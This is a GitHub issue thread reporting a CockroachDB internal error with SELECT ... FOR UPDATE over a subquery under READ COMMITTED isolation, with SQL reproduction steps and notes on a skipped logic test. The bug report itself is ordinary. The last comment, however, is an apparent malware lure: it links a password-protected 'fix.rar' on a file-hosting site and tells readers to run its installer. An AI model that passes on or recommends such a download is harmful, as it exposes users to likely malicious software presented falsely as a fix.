### ISSUE TITLE
optbuilder: internal error with FOR UPDATE with a subquery under READ COMMITTED

### ISSUE THREAD

**Issue by rafiss** [cockroachdb/cockroach#129647]
**Describe the problem**

When using READ COMMITTED, it's possible to hit an internal error that causes valid queries to fail.

**To Reproduce**

```
CREATE TABLE foo(x INT);

SET default_transaction_isolation = 'read committed';

SELECT * FROM (SELECT * FROM foo WHERE x = 2) FOR UPDATE;
```

**Additional context**

This is currently failing in the `dangerous_statements` logic test, so the test case is skipped.

The test was added in https://github.com/cockroachdb/cockroach/commit/af31225706aaf204d83d8f95f815bc8b3ffc053d.

Due to a testing bug, the test was skipped in the `local-read-committed` config, until https://github.com/cockroachdb/cockroach/pull/129523 fixed that.

Jira issue: CRDB-41640

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
